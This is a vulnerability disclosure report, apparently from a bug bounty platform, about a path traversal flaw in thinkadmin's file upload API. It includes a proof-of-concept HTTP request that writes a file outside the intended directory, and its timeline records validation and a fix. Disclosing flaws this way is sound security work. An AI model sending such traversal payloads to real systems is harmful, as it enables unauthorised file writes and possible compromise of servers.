External Control of File Name or Path in zoujingli/thinkadmin


Reported on

Sep 15th 2021


upload file to any path

Proof of Concept

User can upload file to any path by path-traversal

POST /admin/api.upload/file.html HTTP/2
Host: v6.thinkadmin.top
Cookie: lang=zh-cn; PHPSESSID=88a2945fb139bb74f87137d2144709ab; limit=20
Content-Length: 14170
Sec-Ch-Ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"
Accept: text/plain, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAn0D7Qsi6kRX5BBr
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://v6.thinkadmin.top
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://v6.thinkadmin.top/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

Content-Disposition: form-data; name="key"

Content-Disposition: form-data; name="safe"

Content-Disposition: form-data; name="uptype"

Content-Disposition: form-data; name="file"; filename="aaa.jpg"
Content-Type: image/jpeg


Here see i can traverse path e4/../949bdb5f9077bfed982ca9b7bfadbeb.jpg and it will upload file .
Now you can access file by going https://v6.thinkadmin.top//upload/949bdb5f9077bfed982ca9b7bfadbeb.jpg .


This vulnerability is capable of...

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back 2 years ago
邹景立 validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 marked this as fixed with commit 29b05d 2 years ago
邹景立 has been awarded the fix bounty
This vulnerability will not receive a CVE
2 years ago


Subsequent adjustment:


to join this conversation